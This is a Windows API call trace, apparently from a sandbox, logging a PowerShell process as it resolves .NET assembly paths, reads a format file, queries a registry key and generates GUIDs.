	[0276.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0277.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0277.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0277.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0277.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0277.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0277.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0277.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0277.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0277.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0277.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0277.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0277.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0277.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0277.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0277.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0278.249] VirtualQuery (in: lpAddress=0x16bd20, lpBuffer=0x16cbe0, dwLength=0x30 | out: lpBuffer=0x16cbe0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.250] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xc87d39f5, Data2=0x7707, Data3=0x48bb, Data4=([0]=0xa4, [1]=0xd3, [2]=0xd4, [3]=0xe5, [4]=0x8c, [5]=0xed, [6]=0x23, [7]=0x74))) returned 0x0
	[0278.251] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x236fd659, Data2=0x656f, Data3=0x46dc, Data4=([0]=0xa4, [1]=0x9f, [2]=0xe9, [3]=0xe7, [4]=0xf7, [5]=0xa2, [6]=0x6c, [7]=0xaf))) returned 0x0
	[0278.252] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.253] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.255] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x8b8598bc, Data2=0xa4c6, Data3=0x454b, Data4=([0]=0xac, [1]=0xdb, [2]=0x36, [3]=0x48, [4]=0x3c, [5]=0x1b, [6]=0x59, [7]=0x7c))) returned 0x0
	[0278.258] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x37a3826c, Data2=0x49ad, Data3=0x4d04, Data4=([0]=0x90, [1]=0x16, [2]=0x0, [3]=0x4c, [4]=0x49, [5]=0xad, [6]=0x5c, [7]=0xdf))) returned 0x0
	[0278.258] VirtualQuery (in: lpAddress=0x16c120, lpBuffer=0x16cfe0, dwLength=0x30 | out: lpBuffer=0x16cfe0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.259] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.259] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.260] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x63dd1366, Data2=0x454e, Data3=0x44ea, Data4=([0]=0xa5, [1]=0x32, [2]=0xf2, [3]=0x9a, [4]=0xfc, [5]=0x42, [6]=0x18, [7]=0xe5))) returned 0x0
	[0278.260] VirtualQuery (in: lpAddress=0x16c120, lpBuffer=0x16cfe0, dwLength=0x30 | out: lpBuffer=0x16cfe0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.260] VirtualQuery (in: lpAddress=0x16bf40, lpBuffer=0x16ce00, dwLength=0x30 | out: lpBuffer=0x16ce00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.261] VirtualQuery (in: lpAddress=0x16b790, lpBuffer=0x16c650, dwLength=0x30 | out: lpBuffer=0x16c650*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.261] VirtualQuery (in: lpAddress=0x16b790, lpBuffer=0x16c650, dwLength=0x30 | out: lpBuffer=0x16c650*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.261] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xa51ebe88, Data2=0x9234, Data3=0x403b, Data4=([0]=0x97, [1]=0x5e, [2]=0x8e, [3]=0xde, [4]=0xc8, [5]=0xbf, [6]=0x90, [7]=0xd2))) returned 0x0
	[0278.261] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x2a552a31, Data2=0xcfbf, Data3=0x477b, Data4=([0]=0xaf, [1]=0xd4, [2]=0xae, [3]=0x40, [4]=0xe2, [5]=0x49, [6]=0x6a, [7]=0x64))) returned 0x0
	[0278.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.262] SetErrorMode (uMode=0x1) returned 0x1
	[0278.262] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0278.262] GetFileType (hFile=0x1d0) returned 0x1
	[0278.262] SetErrorMode (uMode=0x1) returned 0x1
	[0278.262] GetFileType (hFile=0x1d0) returned 0x1
	[0278.262] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.263] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.263] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.263] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.264] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.264] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.264] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.265] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.265] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.266] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.266] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.266] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.266] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.267] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.267] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.267] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.268] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.269] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0xbce, lpOverlapped=0x0) returned 1
	[0278.269] ReadFile (in: hFile=0x1d0, lpBuffer=0x346586e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x346586e*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0278.269] ReadFile (in: hFile=0x1d0, lpBuffer=0x3466138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3466138*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0278.269] CloseHandle (hObject=0x1d0) returned 1
	[0278.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.270] SetErrorMode (uMode=0x1) returned 0x1
	[0278.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1a0 | out: lpFileInformation=0x16d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0278.270] SetErrorMode (uMode=0x1) returned 0x1
	[0278.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.270] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d288 | out: phkResult=0x16d288*=0x1d0) returned 0x0
	[0278.270] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x56) returned 0x0
	[0278.270] CoTaskMemAlloc (cb=0x5a) returned 0x2bb5a0
	[0278.270] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d1dc, lpData=0x2bb5a0, lpcbData=0x16d1d8*=0x56 | out: lpType=0x16d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d1d8*=0x56) returned 0x0
	[0278.271] CoTaskMemFree (pv=0x2bb5a0) 
	[0278.271] RegCloseKey (hKey=0x1d0) returned 0x0
	[0278.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0283.162] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xad208b, Data2=0x4cfa, Data3=0x456c, Data4=([0]=0x99, [1]=0xe9, [2]=0xcd, [3]=0x7a, [4]=0xf9, [5]=0x84, [6]=0xad, [7]=0x7f))) returned 0x0
	[0283.163] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x9e82b2fe, Data2=0x5439, Data3=0x494e, Data4=([0]=0xb2, [1]=0x8, [2]=0x86, [3]=0x5f, [4]=0xfc, [5]=0x60, [6]=0x0, [7]=0x26))) returned 0x0
	[0283.163] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x3b0327c8, Data2=0xf9d0, Data3=0x49f1, Data4=([0]=0xad, [1]=0x1e, [2]=0x66, [3]=0x78, [4]=0xf4, [5]=0x1c, [6]=0x55, [7]=0x8e))) returned 0x0
	[0283.163] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x4bc9dcf, Data2=0x1560, Data3=0x48a9, Data4=([0]=0xbf, [1]=0xcd, [2]=0xff, [3]=0x51, [4]=0x14, [5]=0xd3, [6]=0x8, [7]=0x7a))) returned 0x0
	[0283.164] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x840ae093, Data2=0x2359, Data3=0x4a35, Data4=([0]=0xa0, [1]=0xb, [2]=0x85, [3]=0xb1, [4]=0x1d, [5]=0xee, [6]=0xc6, [7]=0xdd))) returned 0x0
	[0283.164] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x3eefdf76, Data2=0x646d, Data3=0x424d, Data4=([0]=0x81, [1]=0xd1, [2]=0x3f, [3]=0xe3, [4]=0xa7, [5]=0xd3, [6]=0xbc, [7]=0xb7))) returned 0x0
	[0283.164] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.165] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xfed69ae3, Data2=0x9069, Data3=0x424f, Data4=([0]=0x84, [1]=0xee, [2]=0xd4, [3]=0xef, [4]=0xd3, [5]=0xd4, [6]=0x16, [7]=0x8e))) returned 0x0
